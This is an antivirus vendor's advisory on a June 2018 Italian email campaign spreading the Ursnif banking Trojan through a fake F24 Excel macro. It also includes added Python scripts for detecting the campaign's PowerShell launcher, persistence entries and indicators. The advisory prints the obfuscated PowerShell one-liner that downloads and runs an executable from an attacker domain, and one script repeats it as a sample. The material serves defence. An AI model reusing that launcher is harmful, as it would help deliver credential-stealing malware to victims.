27/06/2018 11:15

June 27, 2018 malware campaign via email targeting Italy with fake F24, spreading banking Trojan UrSnif


A malicious email containing an Excel attachment, leading to the download of a new variant of the banker malware UrSnif, has been distributed since June 27, 2018

TG Soft's C.R.A.M. (Anti-Malware Research Center) analyzed the email campaign spreading the Ursnif Trojan banker on June 27, 2018.

Cyber-criminals use "social engineering" techniques in fraudulent mass mailings to induce the victim to open infected attachments or click on links in the body of the message.
If you have received a suspicious email, send it to C.R.A.M. (Anti-Malware Research Center): see "How to send suspicious emails for analysis" below.


"URSNIF" malware campaign.

Name: Trojan.Win32.Ursnif
Malware campaign: Banker
VirIT: X97M.Downloader.BM, Trojan.Win32.Downloader.RLJ, Trojan.Win32.Ursnif.HI

Description:
The email campaign started on the morning of June 27, 2018.

Example of an examined email (Italian lure text, with English translation in brackets):

Subject: ricevute F24 [F24 receipts]

Buongiorno, [Good morning,]

ti allego f24 [I attach the F24]

Cordiali saluti [Kind regards]

How it spreads:
The email is made to look like the submission of an F24 tax form and carries a malicious Excel file as attachment.
The attachment contains a macro that, if executed, immediately runs a CMD.exe command that starts the download of the malware (Trojan.Win32.Downloader.RLJ) through the Windows PowerShell.exe program:
 
 POwerSHeLL  -nolO -exEcu  bypAss  -nONI -nOprOFi - wiNd  HiDDeN    
"$7d0mK6 = [TyPE](\"{1}{0}{3}{2}\" -f 'on','ENVIr','Nt','mE') ; 
do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} =  $7d0mk6::geTFolDeRPAtH(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','CLi')).dOwNloADfILE.inVOKE
(\"http://cloudphotos[.]party/fogliodati\",\"$Des\6576890.exe\")}
while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\6576890.exe

The file is downloaded to the user's Desktop and executed. Once active, it copies itself into %appdata%\Microsoft\Windows\[RANDOM FOLDER]\
Example folder: %appdata%\Microsoft\Windows\ucbaigjt\, with filename cvbesvse.exe
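The launcher above is recognisable less by any single string than by the combination of abbreviated switches, the -f format operator assembling cmdlet names, a backtick inside a variable name and erratic letter case. The following script, added here as an illustration and not part of TG Soft's analysis or tooling, scores process-creation command lines on exactly those traits. The weights, threshold and the two benign command lines are my own constructions; the suspicious sample reproduces the shape of the command published above with the URL kept defanged.

```python
"""Heuristic scoring of PowerShell command lines for the obfuscation traits of the
macro launcher described above.  Constructed example: the weights are not Vir.IT
signatures, and a hit should start triage rather than an automatic block."""
import re
from dataclasses import dataclass, field

# Launch parameters that PowerShell accepts by unambiguous prefix ("-nOprOFi" == -NoProfile).
LAUNCH_PARAMS = ("nologo", "noninteractive", "noprofile",
                 "executionpolicy", "windowstyle", "encodedcommand")

# Constructed sample in the shape of the campaign's launcher (URL defanged as on the page).
MACRO_LAUNCHER = r'''POwerSHeLL -nolO -exEcu bypAss -nONI -nOprOFi -wiNd HiDDeN "$7d0mK6 = [TyPE](\"{1}{0}{3}{2}\" -f 'on','ENVIr','Nt','mE'); do{&(\"{1}{0}\" -f 'ep','sle') 33; ${D`es} = $7d0mK6::geTFolDeRPAtH(\"Desktop\"); (&(\"{0}{1}{2}\" -f 'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\" -f 'Sy','te','s','m.Ne','ent','t.Web','CLi')).dOwNloADfILE.inVOKE(\"http://cloudphotos[.]party/fogliodati\",\"$Des\6576890.exe\")} while(!${?}); &(\"{0}{2}{3}{1}\" -f 'St','ocess','art','-Pr') $Des\6576890.exe"'''
# Constructed benign administration command line for comparison.
BENIGN_ADMIN = r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"


@dataclass
class Verdict:
    score: int = 0
    hits: list = field(default_factory=list)

    def add(self, reason, weight):
        self.hits.append(reason)
        self.score += weight

    def suspicious(self, threshold=8):
        return self.score >= threshold


def expand_switch(token):
    """Resolve an abbreviated switch such as '-exEcu' to its full parameter name, or None."""
    name = token.lstrip("-/").lower()
    if len(name) < 2:
        return None
    matches = [p for p in LAUNCH_PARAMS if p.startswith(name)]
    return matches[0] if len(matches) == 1 else None


def erratic_case(word):
    """'dOwNloADfILE' has four lower->upper jumps; PascalCase 'DownloadFile' has one."""
    humps = sum(1 for a, b in zip(word, word[1:]) if a.islower() and b.isupper())
    return humps >= 2


def score_cmdline(cmdline):
    v = Verdict()
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if not tok.startswith(("-", "/")):
            continue
        name = expand_switch(tok)
        if name is None:
            continue
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        v.add(name, 1)
        if name == "windowstyle" and nxt and "hidden".startswith(nxt):
            v.add("hidden_window", 2)
        if name == "executionpolicy" and nxt and ("bypass".startswith(nxt) or "unrestricted".startswith(nxt)):
            v.add("policy_bypass", 2)
    # Strings assembled at runtime with the -f format operator: "{1}{0}" -f 'ep','sle'
    if len(re.findall(r"\{\d+\}", cmdline)) >= 3 and re.search(r"-\s*f\s*['\"]", cmdline, re.I):
        v.add("format_operator_string_assembly", 3)
    # A backtick inside a ${...} variable name only serves to defeat string matching.
    if re.search(r"\$\{[^}]*`", cmdline):
        v.add("backtick_in_variable_name", 2)
    # Call operator applied to a string literal: &("New-Object") instead of New-Object.
    if re.search(r"&\s*\(\s*\\?[\"']", cmdline):
        v.add("call_operator_on_string", 2)
    if re.search(r"download(file|string|data)", cmdline, re.I):
        v.add("webclient_download_api", 3)
    words = re.findall(r"[A-Za-z]{5,}", cmdline)
    if sum(1 for w in words if erratic_case(w)) >= 2:
        v.add("erratic_letter_case", 3)
    return v


if __name__ == "__main__":
    for label, line in (("macro launcher", MACRO_LAUNCHER), ("admin script", BENIGN_ADMIN)):
        verdict = score_cmdline(line)
        print(f"{label}: score={verdict.score} suspicious={verdict.suspicious()} hits={verdict.hits}")
```

Run it over Sysmon event 1 or Security 4688 command lines (with command-line auditing enabled). Prefix expansion matters: signatures looking for the literal "-NoProfile" or "-WindowStyle Hidden" miss this launcher entirely, while the expanded parameter names are stable whatever abbreviation and case the macro chooses.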

The XLS file examined downloads malware from the following site:
  • http://cloudphotos[.]party/fogliodati

File name: cvbesvse.exe
Size: 192000 bytes
MD5: 856A792E418146BBF302A5AC9AB69FB7

Trojan.Win32.Downloader.RLJ (cvbesvse.exe), after starting and copying itself to the folder indicated above (%appdata%\Microsoft\Windows\ucbaigjt), creates a shortcut to the executable in
C:\Users\[User]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
with the name ucbaigjt.lnk
This allows the malware to restart every time the user logs in.
 
In addition, a scheduled task is created in "C:\Windows\system32\tasks\" with the name "Opera scheduled Autoupdate 355159213" that runs the malware every 10 minutes, so the downloader becomes active again on the victim's computer even if its process is terminated.
 
At this point, Trojan.Win32.Downloader.RLJ downloads the Ursnif payload from http://cloudmegavideo[.]bid into the user's temporary folder under a random name (in this case the file is called "EDCD.tmp.exe") and then runs it.
As soon as Ursnif starts, it copies itself to the folder %appdata%\Microsoft\[RANDOM FOLDER]\ with a random filename.
In this case the folder is %AppData%\Microsoft\Batmredm\ and the filename is Appxnapi.exe

File name: Appxnapi.exe
Size: 512512 bytes
MD5: 0F499E0BB20EAEE792ED05B85D4A35C7
 
Trojan.Win32.Ursnif.HI is then set to run automatically by adding a value under the following registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[RANDOM] = %AppData%\Microsoft\[RANDOM FOLDER]\[RANDOM NAME].exe
In the examined case:
[AxInASDS] = %AppData%\Microsoft\Batmredm\Appxnapi.exe
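The three persistence mechanisms described above (Startup-folder shortcut, scheduled task, HKCU Run value) share one trait: they all launch an executable with a random-looking name sitting directly under %AppData%\Microsoft\. The script below, added here as an illustration and not part of TG Soft's analysis or products, triages a list of collected autostart artifacts with that pattern plus the task-specific traits from the page (an "update"-style name pointing outside Program Files, a repetition of 10 minutes or less). The Artifact records are constructed from the values the analysis reports; the two benign entries and the thresholds are my own assumptions.

```python
"""Triage of autostart artifacts for the Ursnif persistence pattern described above.
Constructed example: the records below are built from the published values, and the
heuristics are mine, not Vir.IT detection logic."""
import re
from dataclasses import dataclass
from typing import Optional

# An executable directly under %AppData%\Microsoft\<folder>\ or %AppData%\Microsoft\Windows\<folder>\
ROAMING_MS_EXE = re.compile(
    r"(?:%appdata%|\\appdata\\roaming)\\microsoft\\(?:windows\\)?([^\\]+)\\([^\\]+\.exe)$", re.I)
RANDOM_NAME = re.compile(r"[a-z]{6,10}", re.I)


@dataclass
class Artifact:
    kind: str                     # "startup_lnk" | "scheduled_task" | "run_value"
    name: str                     # shortcut file name, task name or Run value name
    target: str                   # resolved executable path
    interval_min: Optional[int] = None   # repetition interval, scheduled tasks only


def assess(artifact):
    """Return the list of reasons an artifact looks like the campaign's persistence, empty if none."""
    reasons = []
    m = ROAMING_MS_EXE.search(artifact.target)
    if m:
        reasons.append("executable_under_roaming_microsoft")
        folder, exe = m.group(1), m.group(2)
        if RANDOM_NAME.fullmatch(folder) and RANDOM_NAME.fullmatch(exe[:-4]):
            reasons.append("random_looking_names")
    if artifact.kind == "startup_lnk" and m:
        reasons.append("startup_shortcut_to_appdata_binary")
    if artifact.kind == "run_value" and m:
        reasons.append("run_key_to_appdata_binary")
    if artifact.kind == "scheduled_task":
        if artifact.interval_min is not None and artifact.interval_min <= 10:
            reasons.append("high_frequency_repetition")
        if re.search(r"update", artifact.name, re.I) and not re.search(r"\\program files", artifact.target, re.I):
            reasons.append("updater_name_outside_program_files")
    return reasons


def triage(artifacts):
    """Map artifact name -> reasons for every artifact that raised at least one reason."""
    return {a.name: r for a in artifacts if (r := assess(a))}


# Records constructed from the values reported in the analysis above, plus two benign ones.
SAMPLE_ARTIFACTS = [
    Artifact("startup_lnk", "ucbaigjt.lnk", r"%appdata%\Microsoft\Windows\ucbaigjt\cvbesvse.exe"),
    Artifact("scheduled_task", "Opera scheduled Autoupdate 355159213",
             r"C:\Users\user\AppData\Roaming\Microsoft\Windows\ucbaigjt\cvbesvse.exe", 10),
    Artifact("run_value", "AxInASDS", r"%AppData%\Microsoft\Batmredm\Appxnapi.exe"),
    # Constructed benign entries: a vendor updater under Program Files and a Local AppData app.
    Artifact("scheduled_task", "Acme Updater (constructed)", r"C:\Program Files\Acme\updater.exe", 60),
    Artifact("run_value", "OneDrive (constructed)", r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_ARTIFACTS).items():
        print(f"{name}: {', '.join(reasons)}")
```

On a live host the Artifact list would be filled from the Startup folder contents (resolving each .lnk target), the XML task definitions under C:\Windows\System32\Tasks and the HKCU Run values; the regex deliberately matches both the %AppData% form found in registry data and the expanded C:\Users\...\AppData\Roaming form found in task actions.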
 
Trojan.Win32.Ursnif belongs to the Banker macro-family; its purpose is to steal login credentials for sensitive services such as home banking, e-mail and FTP.

IOC:
 
MD5:
8F80EC0EAD35359225A0102D28D851F9
856A792E418146BBF302A5AC9AB69FB7
0F499E0BB20EAEE792ED05B85D4A35C7
9F040EE0B7046F39C8A28459841DB2CC
F180DAE16B25BA8615D7C3BBFDEE1F6D
05BFBE6196B33A28314D87546876F953


URL:
http://cloudphotos[.]party/fogliodati
http://cloudmegavideo[.]bid

DGA URLs (not yet active):
http://fogmegavideo[.]win
http://cloudmegatape[.]date
http://cloudmegaaudio[.]faith
http://cloudmegacd[.]loan
http://cloudmegafilm[.]trade
http://hazemegavideo[.]bid
http://smokemegavideo[.]win
http://marmegavideo[.]date
http://skymegavideo[.]faith
http://cloudmegatv[.]loan
http://cloudmegamovie[.]trade
http://plumemegavideo[.]bid
http://showermegavideo[.]win
http://mistmegavideo[.]date
http://dimmegavideo[.]faith
http://cloudmegamusic[.]loan
http://cloudmegaclip[.]trade
http://snowmegavideo[.]bid
http://cloudmegadvd[.]win
http://cloudmegaad[.]date
http://rainmegavideo[.]faith
http://cloudmegabook[.]loan
http://fuelmegavideo[.]trade
http://dustmegavideo[.]bid
http://airmegavideo[.]win
http://windmegavideo[.]date
http://roilmegavideo[.]faith
http://hurtmegavideo[.]loan
http://cloudmegasong[.]trade
http://affectmegavideo[.]bid
http://taintmegavideo[.]win
http://cloudmegaphoto[.]date
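The indicators above are published defanged (the "[.]" notation), and the DGA list means a match has to be made on the registered domain, not on an exact hostname. The script below, added here as an illustration and not part of TG Soft's analysis or tooling, turns an excerpt of the list into a domain set and a hash set and runs them over a few constructed DNS-query log lines. The log format and client addresses are my own assumptions; the hashes and domains are copied from the list above.

```python
"""Match the published IOCs against DNS-query logs and file hashes.
Constructed example: IOC_TEXT is an excerpt of the list above, kept defanged exactly
as printed; DNS_LOG lines and their format are invented for the demonstration."""
import re

IOC_TEXT = """
MD5:
856A792E418146BBF302A5AC9AB69FB7
0F499E0BB20EAEE792ED05B85D4A35C7

URL:
http://cloudphotos[.]party/fogliodati
http://cloudmegavideo[.]bid

DGA URLs (not yet active):
http://fogmegavideo[.]win
http://cloudmegatape[.]date
"""


def refang(text):
    """Undo the defanging used in published reports so the values can be compared to live data."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def parse_iocs(text):
    """Return (domains, md5 hashes) from a defanged IOC section; both sets are lower-cased."""
    fanged = refang(text)
    domains = {m.group(1).lower() for m in re.finditer(r"https?://([^/\s]+)", fanged, re.I)}
    hashes = {h.lower() for h in re.findall(r"\b[0-9a-fA-F]{32}\b", fanged)}
    return domains, hashes


def match_domain(host, domains):
    """Return the IOC domain that host equals or is a subdomain of, else None.
    'notcloudmegavideo.bid' must NOT match 'cloudmegavideo.bid', hence the '.' + d check."""
    host = host.lower().rstrip(".")
    for d in domains:
        if host == d or host.endswith("." + d):
            return d
    return None


# Constructed DNS-query log lines: "<date> <time> <client-ip> <queried-name>".
DNS_LOG = [
    "2018-06-27 11:21:03 10.0.0.17 www.tgsoft.it",
    "2018-06-27 11:21:09 10.0.0.17 cloudphotos.party",
    "2018-06-27 11:31:40 10.0.0.17 cdn.cloudmegavideo.bid.",
    "2018-06-27 11:32:01 10.0.0.42 notcloudmegavideo.bid",
]


def scan_dns_log(lines, domains):
    """Return (client, queried name, matched IOC domain) for every line that hits an IOC."""
    hits = []
    for line in lines:
        _date, _time, client, qname = line.split()
        matched = match_domain(qname, domains)
        if matched:
            hits.append((client, qname.rstrip("."), matched))
    return hits


def is_known_bad_hash(md5_hex, hashes):
    """Case-insensitive lookup of an MD5 digest in the IOC hash set."""
    return md5_hex.lower() in hashes


if __name__ == "__main__":
    domains, hashes = parse_iocs(IOC_TEXT)
    for client, qname, ioc in scan_dns_log(DNS_LOG, domains):
        print(f"{client} queried {qname} (IOC: {ioc})")
    print("192000-byte downloader known:", is_known_bad_hash("856a792e418146bbf302a5ac9ab69fb7", hashes))
```

The DGA entries are worth loading even while "not yet active": the downloader is re-run every 10 minutes by the scheduled task, so a query for one of those names from a host is a strong signal that the dropper is still present after a partial cleanup.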


 


How to identify a fake email

Experience and common sense are the first weapons against these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of ZIP-formatted attachments and, if possible, DO NOT enable automatic macro execution. Enabling automatic execution of macros is strongly discouraged, since simply opening a Word or Excel file would then run its macros immediately, without any prior alert.
If you have been infected by a Banker, the advice from TG Soft's C.R.A.M. is to take appropriate security precautions even after the remediation of the system(s) involved, such as changing the most commonly used Web passwords. If the workstation involved is used for home-banking transactions, an assessment with your credit institution is also recommended.

How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts

Materials can be sent to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, safely in two ways:
  1. Any suspect email can be forwarded directly from the recipient's e-mail client to lite@virit.com, choosing "Forward as Attachment" as the sending mode and putting "Possible phishing page to verify" or "Possible Malware to verify" in the subject;
  2. Save the e-mail to be submitted to TG Soft's C.R.A.M. for analysis as a file external to the e-mail program in use. The resulting file must then be uploaded from the page Send Suspect Files (http://www.tgsoft.it/italy/file_sospetti.asp). If you want feedback on the analysis of the submitted data, indicate an e-mail address and a brief description of the reason for the submission (for example: possible / probable phishing; possible / probable malware or other).
We give you these suggestions to help avoid credential theft, viruses/malware or, even worse, next-generation Ransomware / Crypto-Malware.
 

Integrate your PC / SERVER protection with Vir.IT eXplorer Lite

If you are not yet using Vir.IT eXplorer PRO, we recommend installing Vir.IT eXplorer Lite (FREE Edition) alongside the antivirus in use to increase the security of your computers, PCs and servers alike.

Vir.IT eXplorer Lite has the following special features:
  • freely usable in both private and corporate environments, with Engine+Signature updates without time limitation;
  • interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and servers. We recommend using it as a supplement to the AntiVirus already in use: it does not conflict with or slow down the system, but significantly increases security in terms of identification and remediation of infected files;
  • it identifies and, in many cases, also removes most of the viruses/malware currently circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.IT eXplorer PRO;
  • through the Intrusion Detection technology, also available in the Lite version of Vir.IT eXplorer, the software is able to report new-generation viruses/malware that have set themselves to run automatically and to send the reported files to TG Soft's C.R.A.M.;
  • proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.

For Vir.IT eXplorer PRO users...

Vir.IT eXplorer PRO owners can also contact TG Soft's technical phone support free of charge. The details can be found on the CLIENTS support page.
 


C.R.A.M.

TG Soft's Anti-Malware Research Center

Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”
